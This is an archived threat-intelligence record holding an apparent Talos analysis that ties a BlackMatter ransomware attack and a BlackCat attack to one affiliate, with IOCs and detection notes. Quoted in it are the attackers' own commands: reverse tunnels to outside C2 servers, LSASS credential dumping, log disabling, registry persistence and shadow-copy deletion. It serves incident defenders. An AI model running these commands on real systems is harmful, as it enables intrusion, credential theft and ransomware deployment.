{ "id": "a26f9aeb-1ad8-4c12-b9cf-299999800e77", "created_at": "2026-04-06T00:16:03.312943Z", "updated_at": "2026-04-10T03:29:40.11653Z", "deleted_at": null, "sha1_hash": "4a288f83b64e007445b90bd303be7bc5d9751d68", "title": "From BlackMatter to BlackCat: Analyzing two attacks from one affiliate", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 635462, "plain_text": "From BlackMatter to BlackCat: Analyzing two attacks from one\r\naffiliate\r\nBy Tiago Pereira\r\nPublished: 2022-03-17 · Archived: 2026-04-05 19:16:40 UTC\r\nBlackCat is a recent and growing ransomware-as-a-service (RaaS) group that targeted several organizations\r\nworldwide over the past few months.\r\nThere are rumors of a relationship between BlackCat and the BlackMatter/DarkSide ransomware groups,\r\ninfamous for attacking the Colonial Pipeline last year. According to a BlackCat representative, BlackCat is\r\nnot a rebranding of BlackMatter, but its team is made from affiliates of other RaaS groups (including\r\nBlackMatter).\r\nTalos has observed at least one attacker that used BlackMatter was likely one of the early adopters of\r\nBlackCat. In this post, we'll describe these attacks and the relationship between them.\r\nUnderstanding the techniques and tools used by RaaS affiliates helps organizations detect and prevent\r\nattacks before the ransomware itself is executed, at which point, every second means lost data.\r\nBlackCat ransomware, also known as \"ALPHV,\" has quickly gained notoriety for being used in double ransom\r\n(encrypted files and stolen file disclosure) attacks against companies. It first appeared in November 2021 and,\r\nsince then, several companies have been hit across the globe. However, more than 30 percent of the compromises\r\nhappened to U.S.-based companies.\r\nhttps://blog.talosintelligence.com/2022/03/from-blackmatter-to-blackcat-analyzing.html\r\nPage 1 of 12\n\nSeveral security companies have noticed a connection between the BlackCat, BlackMatter and DarkSide\r\nransomware groups. Recently, in a Recorded Future interview with a BlackCat representative, the representative\r\nconfirmed that there was a connection, but no rebranding or other direct relationship.\r\nThe BlackCat representative explained that the operators are instead affiliates of other RaaS operations and the\r\nactors built upon a foundation of their previous knowledge gained as part of other groups. Affiliates in this context\r\nare the groups that compromise companies' networks and deploy the ransomware provided by the RaaS operators.\r\nIf this is true, BlackCat seems to be a case of vertical business expansion. In essence, it's a way to control the\r\nupstream supply chain by making a service that is key to their business (the RaaS operator) better suited for their\r\nneeds and adding another source of revenue.\r\nVertical expansion is also a common business strategy when there is a lack of trust in the supply chain. There are\r\nseveral cases of vulnerabilities in ransomware encryption, and even of backdoors that can explain a lack of trust in\r\nRaaS. One particular case mentioned by the BlackCat representative, was a flaw in DarkSide/BlackMatter\r\nransomware allowing victims to decrypt their files without paying the ransom. Victims used this vulnerability for\r\nseveral months, resulting in big losses for affiliates.\r\nBlackCat/BlackMatter connection\r\nWhile researching a BlackCat ransomware attack from December 2021, we observed a domain (and respective IP\r\naddresses) used to maintain persistent access to the network. This domain had also been used in a BlackMatter\r\nattack in September 2021. Further analysis revealed more commonalities, such as tools, file names and techniques\r\nthat were common to both ransomware variants.\r\nAffiliates are responsible for compromising systems and deploying ransomware, so it is likely that attacks carried\r\nout by the same ransomware family may differ in techniques and procedures. On the other hand, RaaS operators\r\nare known to make training materials and general techniques and tools available to their affiliates, like the leaked\r\nConti ransomware playbook covered by Talos in a previous blog. This may suggest there are some similarities\r\nacross affiliates.\r\nOne difference we would expect to see across RaaS affiliates is the command and control (C2) infrastructure used\r\nfor certain attacks. However, the overlapping C2 address found used in the BlackMatter and BlackCat attacks lead\r\nus to assess with moderate confidence that the same affiliate was responsible for both attacks.\r\nThis connection suggests that a BlackMatter affiliate was likely an early adopter — possibly in the first month of\r\noperation — of BlackCat. This is further evidence to support the rumors that there are strong ties between\r\nBlackMatter and BlackCat.\r\nAttack details\r\nWe analyzed the actions taken by what we believe to be the same affiliate/attackers in the December BlackCat\r\nattack and a September BlackMatter attack. In terms of attack flow, the attacks were similar to other human-operated ransomware attacks: initial compromise, followed by an exploration and data exfiltration phase, then\r\nattack preparation and finally, the attack execution.\r\nhttps://blog.talosintelligence.com/2022/03/from-blackmatter-to-blackcat-analyzing.html\r\nPage 2 of 12\n\nThe following table summarizes the commonalities and differences in the MITRE ATT\u0026CK® framework between\r\nboth attacks:\r\nInitial access\r\nWe could not identify the initial compromise vector for the BlackCat attack. It is likely that the attack happened on\r\na system not monitored by Cisco Talos telemetry or that a previously compromised account was used to log into\r\nan exposed system.\r\nThere was evidence in the BlackMatter attack that the actor established initial access via the possible exploitation\r\nof Microsoft Exchange vulnerabilities. However, we could not directly tie attempts of exploiting vulnerabilities in\r\nhttps://blog.talosintelligence.com/2022/03/from-blackmatter-to-blackcat-analyzing.html\r\nPage 3 of 12\n\nMicrosoft Exchange to the attack and, for this reason, we assess with low confidence that the attack may have\r\nstarted with the exploitation of a vulnerability in Exchange.\r\nPersistence\r\nBeyond the access provided by the first exploitation vector, the attackers made sure they had additional remote\r\naccess to several internal systems.\r\nDuring the BlackCat attack, the actors used a tool called reverse-ssh, compiled with the C2 server address\r\nembedded, to set up reverse SSH tunnels and provide reverse shells to the attacker. Reverse-ssh was deployed to\r\nC:\\ directory and named: system, Windows or cache task.\r\nIt was also observed hidden by writing to an alternate data stream (ADS) of the C:\\ directory using the following\r\ncommand:\r\nc:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe -command  \u0026 {(get-content c:\\system -raw |\r\nset-content c:\\ -stream 'cachetask')}\r\nc:\\windows\\system32\\schtasks.exe /create /ru system /sc minute /tn microsoft\\windows\\wininet\\cachetask /tr\r\nc:\\:cachetask -b \u003cbind port\u003e /f\r\nc:\\windows\\system32\\schtasks.exe /run /tn microsoft\\windows\\wininet\\cachetask\r\nThe “image file execution option” debugger registry key was another way to ensure the malicious file would be\r\npersistently executed on the system:\r\nc:\\windows\\system32\\reg.exe add hklm\\software\\microsoft\\windows nt\\currentversion\\image file execution\r\noptions\\taskmgr.exe /v debugger /t reg_sz /d c:\\system\r\nDuring the BlackMatter attack, the group used a similar technique but with a different tool: GO Simple Tunnel\r\n(GOST). GOST is a Go-based tunneling tool that was used to establish a reverse SSH tunnel to an attacker-controlled C2 server. This C2 server is the same that was used in the BlackCat attack. The name used for the\r\ndeployed Gost file was \"system.exe\", similar to the file name used in the BlackCat attack for reverse-ssh.\r\ncmd.exe /q /c schtasks /create /ru system /sc hourly /tn windows wsus update /tr c:\\windows\\temp\\system.exe -l\r\nsocks5://127.0.0.1:3388 /st 12:00 /f cmd.exe /q /c schtasks /create /ru system /sc hourly /tn windows defender /tr\r\nc:\\windows\\temp\\system.exe -l rtcp://0.0.0.0:1116/127.0.0.1:3388 -f mwss://52[.]149[.]228[.]45:443 /st 12:00 /f\r\ncmd.exe /q /c schtasks /create /ru system /sc hourly /tn windows wsus update /tr c:\\windows\\temp\\system.exe -l\r\nsocks5://127.0.0.1:3388 /st 12:00 /f cmd.exe /q /c schtasks /create /ru system /sc hourly /tn windows defender /tr\r\nc:\\windows\\temp\\system.exe -l rtcp://0.0.0.0:1117/127.0.0.1:3388 -f mwss://20[.]46[.]245[.]56:443 /st 12:00 /f\r\nThe same C2 domain was used in both attacks:\r\nhttps://blog.talosintelligence.com/2022/03/from-blackmatter-to-blackcat-analyzing.html\r\nPage 4 of 12\n\nDefense evasion\r\nDuring the BlackCat attack, logs were disabled on several systems to avoid detection. For example, before setting\r\nup the reverse-ssh scheduled task tool attackers disabled logs for the task scheduler (a full list of disabled logs is\r\nprovided in the IOC section below).\r\nc:\\windows\\system32\\wevtutil.exe set-log microsoft-windows-taskscheduler/operational /enabled:false\r\nThe anti-rootkit tool Gmer was loaded into a small number of key systems. We believe the attackers used this to\r\ndisable endpoint protection.\r\nc:\\users\\\u003cusername\u003e\\downloads\\gmer\\gmer.exe\r\nCredential access\r\nLocal and domain user credentials were collected, on a few key systems, by dumping the LSASS process memory\r\nand extracting credentials with Microsoft Sysinternals Procdump and Dumpert:\r\nc:\\windows\\system\\procdump.exe -accepteula -ma lsass.exe lsass.dmp\r\nc:\\windows\\system\\dumpert.exe lsass.exe\r\nDuring the BlackMatter attack, the attacker used comsvcs.dll directly to dump LSASS memory:\r\npowershell rundll32.exe c:\\windows\\system32\\comsvcs.dll, minidump (get-process lsass).id\r\nc:\\temp\\lsass.dmp full\r\nBeyond the Windows login credentials, during the BlackCat attack, the attackers used a tool named \"steal.exe\" to\r\nharvest additional data. We could not obtain the binary, but based on the creation of a results folder with an\r\n\"archive.zip\" file inside it, we believe the tool may be HackBrowserData, or a version of it.\r\nThe following commands were used on a few systems:\r\ncmd.exe /q /c steal.exe 1\u003e \\\\127.0.0.1\\admin$\\__\u003cnum\u003e.\u003cnum\u003e 2\u003e\u00261 cmd.exe /q /c cd results 1\u003e\r\n\\\\127.0.0.1\\admin$\\__\u003cnum\u003e.\u003cnum\u003e 2\u003e\u00261 cmd.exe /q /c dir 1\u003e \\\\127.0.0.1\\admin$\\__\u003cnum\u003e.\u003cnum\u003e 2\u003e\u00261\r\n cmd.exe /q /c del archive.zip 1\u003e \\\\127.0.0.1\\admin$\\__\u003cnum\u003e.\u003cnum\u003e 2\u003e\u00261 cmd.exe /q /c del c:\\steal.exe 1\u003e\r\n\\\\127.0.0.1\\admin$\\__\u003cnum\u003e.\u003cnum\u003e 2\u003e\u00261\r\nhttps://blog.talosintelligence.com/2022/03/from-blackmatter-to-blackcat-analyzing.html\r\nPage 5 of 12\n\nDiscovery\r\nDuring the BlackCat attack, we observed network scanning and reconnaissance using softperfect network scanner.\r\nThis tool has many features beyond simple network scanning and was probably a valuable tool in understanding\r\nsystems roles and network infrastructure and possible lateral movement. The following commands show this tool\r\nin use. Notice that the name of the executable has been changed to make it blend into the system's regular\r\nprocesses.\r\ncmd.exe /c c:\\programdata\\system\\svchost.exe /hide /auto:c:\\programdata\\system\\192.xml\r\n/range:192.168.0.0-192.168.255.255 c:\\programdata\\system\\svchost.exe /hide\r\n/auto:c:\\programdata\\system\\192.xml /range:192.168.0.0-192.168.255.255 cmd.exe /c\r\nc:\\programdata\\system\\svchost.exe /hide /auto:c:\\programdata\\system\\192.xml /range:192.168.0.0-\r\n192.168.255.255\r\nADRecon was also used to collect information from Active Directory and its key servers.\r\nc:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe -exec bypass .\\adrecon.ps1\r\nDuring the BlackMatter attack, the attackers also searched for additional ways to maintain access. For example,\r\nthe following command shows the attackers exploring an existing TeamViewer installation:\r\ncmd.exe /q /c teamviewer.exe --getid cmd.exe /q /c dir c:\"program files cmd.exe /q /c dir c:\"program files\r\n(x86) 1 cmd.exe /q /c dir c:\"program files (x86)\\teamviewer\\ cmd.exe /q /c c:\"program files\r\n(x86)\\teamviewer\\teamviewer.exe --getid\r\ncmd.exe /q /c c:\"program files (x86)\\teamviewer\\teamviewer.exe -info\r\nThe following commands show the attackers exploring the keepass password manager config:\r\ncmd.exe /q /c dir c:\"program files (x86)\\\r\ncmd.exe /q /c dir c:\"program files (x86)\"keepass password safe 2\\\r\ncmd.exe /q /c type c:\"program files (x86)\"keepass password safe 2\\keepass.exe.config\r\nLateral movement\r\nWe observed lateral movement using three main tools and techniques, including Impacket's wmiexec, PowerShell\r\nusing WinRM service and Microsoft Remote Desktop.\r\nImpacket's WMIExec provides a shell on remote systems that have the WMI service exposed. We observed its use\r\nin both the BlackCat and BlackMatter attacks. This tool's activity can be detected by detecting processes created\r\nby wmipsrv.exe that terminate with the following string:\r\n1\u003e \\\\127.0.0.1\\admin$\\__\u003ctimestamp\u003e.\u003c6 digits\u003e 2\u003e\u00261\r\nhttps://blog.talosintelligence.com/2022/03/from-blackmatter-to-blackcat-analyzing.html\r\nPage 6 of 12\n\nThis tool was often used to issue a command to allow WinRM service network connections through the firewall,\r\npossibly for the convenience of using some prepared scripts:\r\ncmd.exe /q /c netsh advfirewall firewall add rule name=service dir=in protocol=tcp localport=5985\r\naction=permit 1\u003e \\\\127.0.0.1\\c$\\windows\\temp\\qaiumg 2\u003e\u00261\r\nWinRM allows attackers to use PowerShell to execute commands on remote machines. This tool can be detected\r\nby searching for processes started by \"wsmprovhost.exe\". Below, there's a few examples of WinRM being used\r\nfor lateral movement, in this case, to disable logging of many Windows services:\r\nc:\\windows\\system32\\wevtutil.exe set-log active directory web services /enabled:false\r\nc:\\windows\\system32\\wevtutil.exe set-log application /enabled:false\r\nc:\\windows\\system32\\wevtutil.exe set-log hardwareevents /enabled:false\r\nc:\\windows\\system32\\wevtutil.exe set-log internet explorer /enabled:false\r\nMicrosoft Remote Desktop was also used by the attackers to obtain GUI access to systems. The following\r\nimpacket command was issued before the adversary could gain remote admin access.\r\ncmd.exe /q /c reg add hkey_local_machine\\system\\currentcontrolset\\control\\lsa /v disablerestrictedadmin /t\r\nreg_dword /d 0 1\u003e \\\\127.0.0.1\\admin\\$\\__\u003ctimestamp\u003e\\.\u003cnum\u003e 2\u003e\u00261\r\nOther lateral movement techniques observed include PsEexec on both attacks and RemCom — an open-source\r\nversion of psexec — during the BlackMatter attack.\r\nCommand and control\r\nInterestingly, due to what seems to be an OPSEC mistake using the attacker's shell upload and download\r\ncommand, they revealed the use of Kali Linux to execute remote commands.\r\ncmd.exe /q /c #upload c:\\users\\\u003cuser\u003e\\documents\\\u003cdoc\u003e /home/kali/desktop/\u003cdoc\u003e 1\u003e \\\\127.0.0.1\\admin$\\\r\n\u003cnum\u003e.\u003cnum\u003e 2\u003e\u00261\r\ncmd.exe /q /c #download c:\\users\\\u003cuser\u003e\\documents\\\u003cdoc\u003e /home/kali/desktop/\u003cdoc\u003e 1\u003e\r\n\\\\127.0.0.1\\admin$\\\u003cnum\u003e.\u003cnum\u003e 2\u003e\u00261\r\nIt is unlikely that the attackers had a Kali Linux installation inside the victim's network, so remote control of the\r\nsystems was likely achieved through the SSH tunnels described earlier.\r\nExfiltration\r\nAlthough we observed a suspiciously large number of documents opened and screenshots taken from one of the\r\ncompromised systems, we did not identify techniques used to exfiltrate data from the network. It is possible that\r\nhttps://blog.talosintelligence.com/2022/03/from-blackmatter-to-blackcat-analyzing.html\r\nPage 7 of 12\n\ndocument exfiltration is carried out by the execution of upload/download commands similar to the ones listed\r\nabove.\r\nImpact\r\nIn both attacks, before the actual execution of the ransomware, the attackers performed several actions preparing\r\nsystems to make the execution as successful as possible. On the day of the attack, the attacker logged in to the\r\ndomain controller and opened the group policy management interface. The attackers then dropped and executed a\r\nfile named \"apply.ps1.\" We believe this script created and prepared the group policy to cause the execution of the\r\nransomware throughout the domain.\r\nc:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe -exec bypass .\\apply.ps1\r\nThis execution results in the immediate writing of group policy files to disk and is followed by the execution of\r\nthe following command to force the deployment of the group policy:\r\ncmd.exe /q /c gpupdate /force\r\nA few minutes before BlackCat ransomware started encrypting files, the attackers executed a script called\r\n\"defender.vbs\":\r\ncmd.exe /c \\\\\u003cdomaincontroller\u003e\\netlogon\\defender.vbs\r\nIn the BlackMatter attack, the exact same file was named \"def.vbs\" and executed minutes before the encryption\r\nbegan:\r\ncmd.exe /c \\\\\u003cdomaincontroller\u003e\\netlogon\\def.vbs\r\nWe believe this is part of the attack, but at this time do not know the exact role of this script.\r\nWhen encryption begins, the ransomware file named \u003cnum\u003e.exe in the BlackCat attack and, similarly, \u003cnum\u003e.exe\r\nin the BlackMatter attack, was dropped on the domain servers inside the SYSVOL folder, making it accessible on\r\nthe NETLOGON network share, accessible by all users in the domain. File encryption makes all systems execute\r\nthese files from the remote share.\r\nBlackCat attack:\r\ncmd.exe -c \\\\\u003cdomain controller\u003e\\netlogon\\\u003cnum\u003e.exe --access-token \u003ctoken\u003e\r\nBlackMatter attack:\r\ncmd.exe -c \\\\\u003cdomain controller\u003e\\netlogon\\\u003cnum\u003e.exe\r\nhttps://blog.talosintelligence.com/2022/03/from-blackmatter-to-blackcat-analyzing.html\r\nPage 8 of 12\n\nThe following variations of the BlackCat command were observed:\r\n\u003cnum\u003e.exe --access-token \u003ctoken\u003e /f\r\n\u003cnum\u003e.exe --access-token \u003ctoken\u003e --no-prop-servers \\\\\u003chostname\u003e --propagated\r\n\u003cnum\u003e.exe -access-token \u003ctoken\u003e -v -p \\\\\u003chostname\u003e\\scans\r\n\u003cnum\u003e.exe --access-token \u003ctoken\u003e\r\n\u003cnum\u003e.exe --child --access-token \u003ctoken\u003e\r\n\u003cnum\u003e.exe -access-token \u003ctoken\u003e -v -p .\r\nThe BlackCat executable deployed other commands to make its execution more effective:\r\nc:\\windows\\system32\\cmd.exe /c fsutil behavior set symlinkevaluation r2l:1\r\nc:\\windows\\system32\\cmd.exe /c reg add\r\nhkey_local_machine\\system\\currentcontrolset\\services\\lanmanserver\\parameters /v maxmpxct /d 65535 /t\r\nreg_dword /f c:\\windows\\system32\\cmd.exe /c fsutil behavior set symlinkevaluation r2r:1\r\nc:\\windows\\system32\\cmd.exe /c vssadmin.exe delete shadows /all /quiet c:\\windows\\system32\\cmd.exe /c\r\nwmic.exe shadowcopy delete c:\\windows\\system32\\cmd.exe /c arp -a c:\\windows\\system32\\cmd.exe /c\r\nbcdedit /set {default} c:\\windows\\system32\\cmd.exe /c cmd.exe /c for /f \"tokens=*\" %1 in ('wevtutil.exe el')\r\ndo wevtutil.exe cl \"%1\" c:\\windows\\system32\\cmd.exe /c bcdedit /set {default} recoveryenabled no\r\nConclusion\r\nBlackCat first surfaced in November 2021, with the attack we described here taking place in December 2021.\r\nWhile we don't know how related BlackCat is to BlackMatter, we assess with moderate confidence that based on\r\nthe tools and techniques of these attacks and overlapping infrastructure, BlackMatter affiliates were likely among\r\nthe early adopters of BlackCat.\r\nAs we have seen several times before, RaaS services come and go. Their affiliates, however, are likely to simply\r\nmove on to a new service. And with them, many of the TTPs are likely to persist.\r\nOne key aspect of these attacks is that adversaries take time exploring the environment and preparing it for a\r\nsuccessful and broad attack before launching the ransomware, at which point every second means lost data.\r\nTherefore, it is key that the attack is detected in its early stages.\r\nThe two attacks described here took over 15 days to reach the encryption stage. Knowing the attackers tools and\r\ntechniques and having monitoring and response processes in place could have prevented the successful encryption\r\nof the companies files.\r\nhttps://blog.talosintelligence.com/2022/03/from-blackmatter-to-blackcat-analyzing.html\r\nPage 9 of 12\n\nTalos will continue to monitor RaaS and their affiliates activities and provide intelligence, detection rules and\r\nindicators to help defenders as they work to protect their networks.\r\nIOCs\r\nDomains - Common:\r\nwindows[.]menu\r\nIP's - Common:\r\n52.149.228[.]45\r\n20.46.245[.]56\r\nHashes - Common:\r\nApply.ps1\r\nD97088F9795F278BB6B732D57F42CBD725A6139AFE13E31AE832A5C947099676\r\ndefender.vbs\r\nB54DD21019AD75047CE74FE0A0E608F56769933556AED22D25F4F8B01EE0DA15\r\nHashes - BlackCat:\r\nReverse-ssh (compiled with hardcoded domain):\r\n47AFFAED55D85E1EBE29CF6784DA7E9CDBD86020DF8B2E9162A0B1A67F092DCD\r\nstealer:\r\n65DBAFE9963CB15CE3406DE50E007408DE7D12C98668DE5DA10386693AA6CD73\r\nBlackcat ransomware:\r\n060CA3F63F38B7804420729CDE3FC30D126C2A0FFC0104B8E698F78EDAB96767\r\nHashes - BlackMatter:\r\nBlackMatter ransomware:\r\n706F3EEC328E91FF7F66C8F0A2FB9B556325C153A329A2062DC85879C540839D\r\nCoverage\r\nWays our customers can detect and block this threat are listed below.\r\nhttps://blog.talosintelligence.com/2022/03/from-blackmatter-to-blackcat-analyzing.html\r\nPage 10 of 12\n\nCisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware\r\ndetailed in this post. Try Secure Endpoint for free here.\r\nCisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat\r\nDefense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this\r\nthreat.\r\nCisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically\r\nand alerts users of potentially unwanted activity on every connected device.\r\nCisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco\r\nSecure products.\r\nUmbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and\r\nURLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.\r\nAdditional protections with context to your specific environment and threat data are available from the Firewall\r\nManagement Center.\r\nhttps://blog.talosintelligence.com/2022/03/from-blackmatter-to-blackcat-analyzing.html\r\nPage 11 of 12\n\nOpen-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack\r\navailable for purchase on Snort.org.\r\nOrbital Queries\r\nCisco Secure Endpoint users can use Orbital Advanced Search to run complex OSqueries to see if their endpoints\r\nare infected with this specific threat.\r\nSource: https://blog.talosintelligence.com/2022/03/from-blackmatter-to-blackcat-analyzing.html\r\nhttps://blog.talosintelligence.com/2022/03/from-blackmatter-to-blackcat-analyzing.html\r\nPage 12 of 12", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "MITRE", "ETDA" ], "references": [ "https://blog.talosintelligence.com/2022/03/from-blackmatter-to-blackcat-analyzing.html" ], "report_names": [ "from-blackmatter-to-blackcat-analyzing.html" ], "threat_actors": [ { "id": "d90307b6-14a9-4d0b-9156-89e453d6eb13", "created_at": "2022-10-25T16:07:23.773944Z", "updated_at": "2026-04-10T02:00:04.746188Z", "deleted_at": null, "main_name": "Lead", "aliases": [ "Casper", "TG-3279" ], "source_name": "ETDA:Lead", "tools": [ "Agentemis", "BleDoor", "Cobalt Strike", "CobaltStrike", "RbDoor", "RibDoor", "Winnti", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "6e23ce43-e1ab-46e3-9f80-76fccf77682b", "created_at": "2022-10-25T16:07:23.303713Z", "updated_at": "2026-04-10T02:00:04.530417Z", "deleted_at": null, "main_name": "ALPHV", "aliases": [ "ALPHV", "ALPHVM", "Ambitious Scorpius", "BlackCat Gang", "UNC4466" ], "source_name": "ETDA:ALPHV", "tools": [ "ALPHV", "ALPHVM", "BlackCat", "GO Simple Tunnel", "GOST", "Impacket", "LaZagne", "MEGAsync", "Mimikatz", "Munchkin", "Noberus", "PsExec", "Remcom", "RemoteCommandExecution", "WebBrowserPassView" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434563, "ts_updated_at": 1775791780, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/4a288f83b64e007445b90bd303be7bc5d9751d68.pdf", "text": "https://archive.orkl.eu/4a288f83b64e007445b90bd303be7bc5d9751d68.txt", "img": "https://archive.orkl.eu/4a288f83b64e007445b90bd303be7bc5d9751d68.jpg" } }